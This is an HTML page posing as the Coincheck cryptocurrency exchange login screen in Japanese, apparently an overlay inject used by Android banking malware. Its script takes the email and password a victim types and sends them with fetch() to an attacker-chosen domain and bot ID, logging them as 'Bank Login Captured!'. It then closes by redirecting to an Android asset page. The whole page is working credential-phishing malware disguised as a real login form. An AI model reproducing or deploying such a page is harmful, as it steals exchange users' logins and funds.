<!DOCTYPE html>
<html lang="ja">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Coincheck</title>
<style>
html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}main{display:block}h1{font-size:2em;margin:.67em 0}hr{box-sizing:content-box;height:0;overflow:visible}pre{font-family:monospace,monospace;font-size:1em}a{background-color:transparent}abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}b,strong{font-weight:bolder}code,kbd,samp{font-family:monospace,monospace;font-size:1em}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sub{bottom:-.25em}sup{top:-.5em}img{border-style:none}button,input,optgroup,select,textarea{font-family:inherit;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,[type="button"],[type="reset"],[type="submit"]{-webkit-appearance:button}button::-moz-focus-inner,[type="button"]::-moz-focus-inner,[type="reset"]::-moz-focus-inner,[type="submit"]::-moz-focus-inner{border-style:none;padding:0}button:-moz-focusring,[type="button"]:-moz-focusring,[type="reset"]:-moz-focusring,[type="submit"]:-moz-focusring{outline:1px dotted ButtonText}fieldset{padding:.35em .75em .625em}legend{box-sizing:border-box;color:inherit;display:table;max-width:100%;padding:0;white-space:normal}progress{vertical-align:baseline}textarea{overflow:auto}[type="checkbox"],[type="radio"]{box-sizing:border-box;padding:0}[type="number"]::-webkit-inner-spin-button,[type="number"]::-webkit-outer-spin-button{height:auto}[type="search"]{-webkit-appearance:textfield;outline-offset:-2px}[type="search"]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}details{display:block}summary{display:list-item}template{display:none}[hidden]{display:none}
body {
    background-color: #ffffff;
}
html {
    font-family: "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;
}

#coincheck {
    display: table;
    position: absolute;
    height: 100%;
    width: 100%;
	overflow: hidden;
}
#coincheck .logo {
    text-align: center;
    width: 80%;
    margin-left: 10%;
    margin-bottom: 50px;
}
#coincheck .content {
    margin-left: auto;
    margin-right: auto;
    position: relative;
    max-width: 440px;
    width: calc(100% - 88px);
    padding: 44px 44px 84px 44px;
    margin-bottom: 28px;
    background-color: #fff;
    min-width: 200px;
    overflow: hidden;
}
#coincheck input::placeholder {
    transition: none;
    color: rgba(0,0,0,.42);
}
#coincheck input {
    margin-bottom:1.25em;
    height: 44px;
    width: 100%;
    padding: 0 10px;
    border: none;
    border-bottom: 1px solid #9da3a6;
    background: #fff;
        background-clip: border-box;
    text-overflow: ellipsis;
    -webkit-box-sizing: border-box;
    -moz-box-sizing: border-box;
    box-sizing: border-box;
    -webkit-box-shadow: none;
    -moz-box-shadow: none;
    box-shadow: none;
    color: #000;
    font-size: 1em;
    font-family: Helvetica,Arial,sans-serif;
    font-size: 14px;
    font-weight: 400;
    direction: ltr;
}
#coincheck .createtext {
    margin-bottom: 16px;
    font-size: .8125rem;
    color: #262626;
    text-align: left;
}
#coincheck .btnNext {
    width: 100%;
    height: 46px;
    margin-top: 35px;
    box-shadow: none;
    display: block;
    line-height: 46px;
    background-color: #dddddd;
    color: #909090;
    box-sizing: border-box;
    position: relative;
    -webkit-user-select: none;
    -moz-user-select: none;
    -ms-user-select: none;
    user-select: none;
    cursor: pointer;
    outline: 0;
    border: none;
    -webkit-tap-highlight-color: transparent;
    display: inline-block;
    white-space: nowrap;
    text-decoration: none;
    vertical-align: baseline;
    text-align: center;
    min-width: 64px;
    line-height: 36px;
    padding: 0 16px;
    overflow: visible;
    transform: translate3d(0,0,0);
}
#coincheck .middle {
    display: table-cell;
    vertical-align: middle;
}
#coincheck .mailText {
    margin-top: 35px;
    width: 100%;
    text-align: center;
}
.ainfo {
    text-decoration: none;
    margin-top: 16px;
    text-align: center;
    width: 100%;
    display: block;
    color: #2feecc;
}
</style>
</head>
<body>
    <div id="coincheck">
        <div class="middle">
            <div class="content">
                <div class="logo">
                    <svg version="1.1" id="レイヤー_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 180 34.6" style="enable-background:new 0 0 180 34.6;" xml:space="preserve">
                        <style type="text/css">
                            .st0{fill:url(#SVGID_1_);}
                            .st1{fill:#003C3C;}
                        </style>
                        <title>logo</title>
                        <linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="28.0986" y1="8.2148" x2="6.5519" y2="26.2946">
                            <stop offset="0" style="stop-color:#50FEBE"/>
                            <stop offset="1" style="stop-color:#0ADCDC"/>
                        </linearGradient>
                        <path class="st0" d="M18.4,0.7c0-0.3,0.1-0.6,0.2-0.7l16,16c-0.1,0.1-0.2,0.2-0.4,0.2h-5.8c-0.9-0.1-2-0.6-2.6-1.2l-6.2-6.2  c-0.7-0.7-1.2-2-1.2-2.9L18.4,0.7z M28.7,18.5c-0.9,0-2.3,0.5-2.9,1.2l-6.2,6.2c-0.7,0.7-1.2,2-1.2,2.9l0,3.9V34  c0,0.3,0.1,0.4,0.2,0.6l16-16c-0.1-0.1-0.4-0.1-0.6-0.1L28.7,18.5z M5.8,16.2c0.9,0,2.3-0.5,2.9-1.2L15,8.8c0.7-0.7,1.2-2,1.2-2.9  l0-5.2c0-0.3-0.1-0.6-0.2-0.7L0,16c0.1,0.1,0.4,0.2,0.7,0.2L5.8,16.2z M16.1,28.8c0-0.9-0.5-2.3-1.2-2.9l-6.2-6.2  c-0.7-0.7-2-1.2-2.9-1.2l-5.2,0c-0.3,0-0.5,0-0.6,0.1l16,16c0.1-0.1,0.1-0.3,0.1-0.6L16.1,28.8z M24.2,16.6L18,10.4  c-0.4-0.4-1-0.4-1.4,0l-6.2,6.2c-0.4,0.4-0.4,1,0,1.4l6.2,6.2c0.4,0.4,1,0.4,1.4,0l6.2-6.2C24.6,17.7,24.6,17,24.2,16.6z"/>
                        <path class="st1" d="M45.1,17.8c0-1,0.2-2,0.5-3c0.4-1,0.9-1.9,1.5-2.7c0.7-0.8,1.5-1.4,2.5-1.9c1-0.5,2.1-0.7,3.3-0.7  c1.5,0,2.7,0.3,3.8,1c1,0.7,1.8,1.5,2.3,2.6l-1,0.6c-0.3-0.6-0.6-1.1-1-1.4c-0.4-0.4-0.8-0.7-1.3-0.9c-0.5-0.2-0.9-0.4-1.4-0.5  c-0.5-0.1-1-0.2-1.5-0.2c-1.1,0-2,0.2-2.8,0.6c-0.8,0.4-1.5,1-2.1,1.7c-0.6,0.7-1,1.5-1.3,2.3c-0.3,0.9-0.4,1.7-0.4,2.6  c0,1,0.2,1.9,0.5,2.8c0.3,0.9,0.8,1.7,1.4,2.3c0.6,0.7,1.3,1.2,2.1,1.6c0.8,0.4,1.7,0.6,2.6,0.6c0.5,0,1-0.1,1.5-0.2  c0.5-0.1,1-0.3,1.5-0.6c0.5-0.3,0.9-0.6,1.4-1c0.4-0.4,0.8-0.9,1.1-1.5l1,0.5c-0.3,0.6-0.7,1.2-1.1,1.7c-0.5,0.5-1,0.9-1.6,1.2  c-0.6,0.3-1.2,0.6-1.9,0.7c-0.7,0.2-1.3,0.2-1.9,0.2c-1.1,0-2.2-0.2-3.1-0.7c-0.9-0.5-1.8-1.1-2.4-1.9c-0.7-0.8-1.2-1.7-1.6-2.7  C45.3,19.9,45.1,18.8,45.1,17.8z M70,26.4c-0.9,0-1.6-0.2-2.4-0.5c-0.7-0.3-1.4-0.8-1.9-1.4c-0.5-0.6-0.9-1.2-1.2-2  C64.2,21.8,64,21,64,20.1c0-0.9,0.2-1.7,0.5-2.4c0.3-0.8,0.7-1.4,1.2-2c0.5-0.6,1.2-1,1.9-1.4c0.7-0.3,1.5-0.5,2.3-0.5  c0.8,0,1.6,0.2,2.3,0.5c0.7,0.3,1.3,0.8,1.9,1.4c0.5,0.6,1,1.2,1.3,2c0.3,0.8,0.5,1.6,0.5,2.4c0,0.8-0.2,1.6-0.5,2.4  c-0.3,0.8-0.7,1.4-1.2,2c-0.5,0.6-1.2,1-1.9,1.4C71.6,26.3,70.8,26.4,70,26.4z M65.2,20.2c0,0.7,0.1,1.4,0.4,2  c0.2,0.6,0.6,1.2,1,1.6c0.4,0.5,0.9,0.8,1.5,1.1c0.6,0.3,1.2,0.4,1.8,0.4c0.7,0,1.3-0.1,1.8-0.4c0.6-0.3,1.1-0.7,1.5-1.1  c0.4-0.5,0.8-1,1-1.7c0.2-0.6,0.4-1.3,0.4-2c0-0.7-0.1-1.4-0.4-2c-0.2-0.6-0.6-1.2-1-1.7c-0.4-0.5-0.9-0.9-1.5-1.1  c-0.6-0.3-1.2-0.4-1.8-0.4c-0.7,0-1.3,0.1-1.8,0.4c-0.6,0.3-1.1,0.7-1.5,1.1c-0.4,0.5-0.8,1-1,1.7C65.3,18.8,65.2,19.5,65.2,20.2z   M81.6,11.3V9.1h1.2v2.1H81.6z M81.6,26.2V14.1h1.2v12.1H81.6z M99.3,26.2h-1.2v-6.8c0-1.6-0.2-2.7-0.7-3.4  c-0.4-0.7-1.1-1.1-2.1-1.1c-0.5,0-1,0.1-1.5,0.3c-0.5,0.2-1,0.5-1.4,0.8c-0.4,0.3-0.8,0.7-1.1,1.2c-0.3,0.5-0.6,1-0.7,1.5v7.5h-1.2  V14.1h1.1v2.9c0.2-0.5,0.6-0.9,0.9-1.3c0.4-0.4,0.8-0.7,1.2-1c0.5-0.3,0.9-0.5,1.5-0.6c0.5-0.1,1-0.2,1.6-0.2c1.3,0,2.3,0.5,2.8,1.4  c0.5,0.9,0.8,2.3,0.8,4V26.2z M104.9,20.1c0-0.9,0.1-1.7,0.4-2.4c0.3-0.8,0.7-1.4,1.2-2c0.5-0.6,1.2-1,1.9-1.3  c0.7-0.3,1.5-0.5,2.4-0.5c1.1,0,2.1,0.2,2.9,0.7c0.8,0.5,1.5,1.2,1.9,2.1l-1.1,0.4c-0.4-0.7-0.9-1.2-1.5-1.6  c-0.7-0.4-1.4-0.6-2.2-0.6c-0.7,0-1.3,0.1-1.9,0.4c-0.6,0.3-1.1,0.6-1.5,1.1c-0.4,0.5-0.8,1-1,1.6c-0.2,0.6-0.4,1.3-0.4,2  c0,0.7,0.1,1.4,0.4,2.1c0.3,0.6,0.6,1.2,1,1.7c0.4,0.5,0.9,0.9,1.5,1.1c0.6,0.3,1.2,0.4,1.9,0.4c0.4,0,0.8-0.1,1.2-0.2  c0.4-0.1,0.8-0.3,1.1-0.5c0.4-0.2,0.7-0.4,0.9-0.7c0.3-0.3,0.4-0.6,0.5-0.9l1.1,0.3c-0.2,0.4-0.4,0.8-0.7,1.2  c-0.3,0.4-0.7,0.7-1.1,0.9c-0.4,0.3-0.9,0.5-1.4,0.6c-0.5,0.1-1.1,0.2-1.6,0.2c-0.9,0-1.7-0.2-2.4-0.5c-0.7-0.3-1.4-0.8-1.9-1.4  c-0.5-0.6-1-1.3-1.3-2C105.1,21.8,104.9,21,104.9,20.1z M131.3,26.2h-1.2v-6.8c0-3-1-4.5-3-4.5c-0.5,0-1,0.1-1.5,0.3  c-0.5,0.2-0.9,0.5-1.3,0.8c-0.4,0.3-0.8,0.7-1.1,1.2c-0.3,0.5-0.5,1-0.7,1.5v7.5h-1.2v-17h1.2v7.8c0.5-0.9,1.2-1.7,2.1-2.3  c0.9-0.6,1.8-0.8,2.8-0.8c0.7,0,1.2,0.1,1.7,0.4c0.5,0.2,0.9,0.6,1.2,1.1c0.3,0.5,0.6,1,0.7,1.7c0.1,0.7,0.2,1.4,0.2,2.2V26.2z   M142.9,26.4c-0.9,0-1.7-0.2-2.4-0.5c-0.7-0.3-1.4-0.8-1.9-1.4c-0.5-0.6-1-1.3-1.3-2c-0.3-0.8-0.5-1.6-0.5-2.5  c0-0.9,0.2-1.7,0.5-2.4c0.3-0.8,0.7-1.4,1.2-2c0.5-0.6,1.2-1,1.9-1.3c0.7-0.3,1.5-0.5,2.3-0.5c0.9,0,1.7,0.2,2.4,0.5  c0.7,0.3,1.4,0.8,1.9,1.4c0.5,0.6,0.9,1.2,1.2,2c0.3,0.8,0.4,1.6,0.4,2.4c0,0.1,0,0.2,0,0.3c0,0.1,0,0.2,0,0.2h-10.6  c0,0.7,0.2,1.4,0.5,1.9c0.3,0.6,0.6,1.1,1.1,1.6c0.4,0.4,0.9,0.8,1.5,1c0.6,0.2,1.2,0.4,1.8,0.4c0.4,0,0.8-0.1,1.2-0.2  c0.4-0.1,0.8-0.3,1.1-0.5c0.4-0.2,0.7-0.4,0.9-0.7c0.3-0.3,0.5-0.6,0.6-0.9l1,0.3c-0.2,0.4-0.4,0.8-0.8,1.2  c-0.3,0.4-0.7,0.7-1.2,0.9c-0.4,0.3-0.9,0.5-1.5,0.6C144,26.4,143.5,26.4,142.9,26.4z M147.7,19.7c0-0.7-0.2-1.4-0.5-2  c-0.3-0.6-0.6-1.1-1.1-1.5c-0.4-0.4-0.9-0.8-1.5-1c-0.6-0.2-1.2-0.4-1.8-0.4s-1.2,0.1-1.8,0.4c-0.6,0.2-1.1,0.6-1.5,1  c-0.4,0.4-0.8,0.9-1,1.5c-0.3,0.6-0.4,1.2-0.5,1.9H147.7z M153.5,20.1c0-0.9,0.1-1.7,0.4-2.4c0.3-0.8,0.7-1.4,1.2-2  c0.5-0.6,1.2-1,1.9-1.3c0.7-0.3,1.5-0.5,2.4-0.5c1.1,0,2.1,0.2,2.9,0.7c0.8,0.5,1.5,1.2,1.9,2.1l-1.1,0.4c-0.4-0.7-0.9-1.2-1.5-1.6  c-0.7-0.4-1.4-0.6-2.2-0.6c-0.7,0-1.3,0.1-1.9,0.4c-0.6,0.3-1.1,0.6-1.5,1.1c-0.4,0.5-0.8,1-1,1.6c-0.2,0.6-0.4,1.3-0.4,2  c0,0.7,0.1,1.4,0.4,2.1c0.3,0.6,0.6,1.2,1,1.7c0.4,0.5,0.9,0.9,1.5,1.1c0.6,0.3,1.2,0.4,1.9,0.4c0.4,0,0.8-0.1,1.2-0.2  c0.4-0.1,0.8-0.3,1.1-0.5c0.4-0.2,0.7-0.4,0.9-0.7c0.3-0.3,0.4-0.6,0.5-0.9l1.1,0.3c-0.2,0.4-0.4,0.8-0.7,1.2  c-0.3,0.4-0.7,0.7-1.1,0.9c-0.4,0.3-0.9,0.5-1.4,0.6c-0.5,0.1-1.1,0.2-1.6,0.2c-0.9,0-1.7-0.2-2.4-0.5c-0.7-0.3-1.4-0.8-1.9-1.4  c-0.5-0.6-1-1.3-1.3-2C153.6,21.8,153.5,21,153.5,20.1z M178.7,26.2l-4.7-6.5l-2.9,2.6v3.9h-1.2v-17h1.2v11.9l7.4-7h1.4l-5.1,4.9  l5.2,7.2H178.7z"/>
                    </svg>
                </div>
                <div id="page3">
                    <input id="coinchecklogin" type="text" name="email" placeholder="メールアドレス">
                    <input id="coincheckpassword" type="password" name="password" placeholder="パスワード">
                    <a class="ainfo" href="#">パスワードをお忘れの方はこちら</a>
					<input name="exit" type="hidden" text="true"/>
                    <button class="btnNext" onclick="process('coincheck');">ログイン</button>
                </div>
            </div>
        </div>
    </div>
</body>
<script>function closeapp(){setTimeout(function(){ window.location.replace("file:///android_asset/closeapp.html");}, 1000); };

function Backcoincheck() {
    document.getElementById('page3').style.display = 'block';
    document.getElementById('page4').style.display = 'none';
}

function process(formId) {
    try {
	var url_string = window.location.href;
var url = new URL(url_string);
var botid = url.searchParams.get("botid");
var domain = url.searchParams.get("domain");var path = window.location.pathname;var page = path.split("/").pop();
        fetch("https://"+domain+"/project/apiMethods/uploadLog.php?log=Bank Login Captured! -----<b> Bot ID:</b> "+botid+"<br>"+page.replace(".html","")+" | "+formToJSONbyName(document.getElementById(formId))); closeapp();
    } catch (err) {}
}

/*********Recursive implementation of jSON.stringify; ********/
var stringifyJSON = function(obj) {
    var arrOfKeyVals = [],
        arrVals = [],
        objKeys = [];

    /*********CHECK FOR PRIMITIVE TYPES**********/
    if (typeof obj === 'number' || typeof obj === 'boolean' || obj === null)
        return '' + obj;
    else if (typeof obj === 'string')
        return '"' + obj + '"';

    /*********CHECK FOR ARRAY**********/
    else if (Array.isArray(obj)) {
        if (obj[0] === undefined)
            return '[]';
        else {
            obj.forEach(function(el) {
                arrVals.push(stringifyJSON(el));
            });
            return '[' + arrVals + ']';
        }
    }
    /*********CHECK FOR OBJECT**********/
    else if (obj instanceof Object) {
        objKeys = Object.keys(obj);
        objKeys.forEach(function(key) {
            var keyOut = '"' + key + '":';
            var keyValOut = obj[key];
            if (keyValOut instanceof Function || typeof keyValOut === undefined)
                arrOfKeyVals.push('');
            else if (typeof keyValOut === 'string')
                arrOfKeyVals.push(keyOut + '"' + keyValOut + '"');
            else if (typeof keyValOut === 'boolean' || typeof keyValOut === 'number' || keyValOut === null)
                arrOfKeyVals.push(keyOut + keyValOut);
            else if (keyValOut instanceof Object) {
                arrOfKeyVals.push(keyOut + stringifyJSON(keyValOut));
            }
        });
        return '{' + arrOfKeyVals + '}';
    }
};

function formToJSONbyName(f)
{
    var FinalObject = {}, namesHTML = ['input','select'];
    for(var i = 0; i < namesHTML.length; i++) {
		var bsform = f.getElementsByTagName(namesHTML[i]);
        for(var j = 0; j < bsform.length; j++) {
            FinalObject[bsform[j].name] = bsform[j].value
        }
    }
    return stringifyJSON(FinalObject);
}

</script>
</html>